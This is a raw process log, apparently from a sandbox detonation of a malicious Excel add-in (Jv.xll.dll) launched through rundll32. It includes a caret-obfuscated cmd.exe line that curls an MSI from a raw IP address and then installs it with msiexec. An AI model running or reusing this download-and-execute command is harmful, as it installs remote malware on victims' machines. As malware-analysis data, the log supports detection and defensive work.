rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,hash
2616rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,hash
2904rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,reverseString
2712rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,reverseString
3032rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,xlAutoOpen
2804rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,xlAutoOpen
2992cmd.exe c:\windows\system32\cmd.exe /c c^url -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0&&timeout 10&&c:\users\public\1.msi
940curl.exe curl -o c:\users\public\1.msi http://51.195.49.233/dGp9oe/rAoeU0
148timeout.exe timeout 10
2428msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\users\public\1.msi"
2552rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\Jv.xll.dll,
2928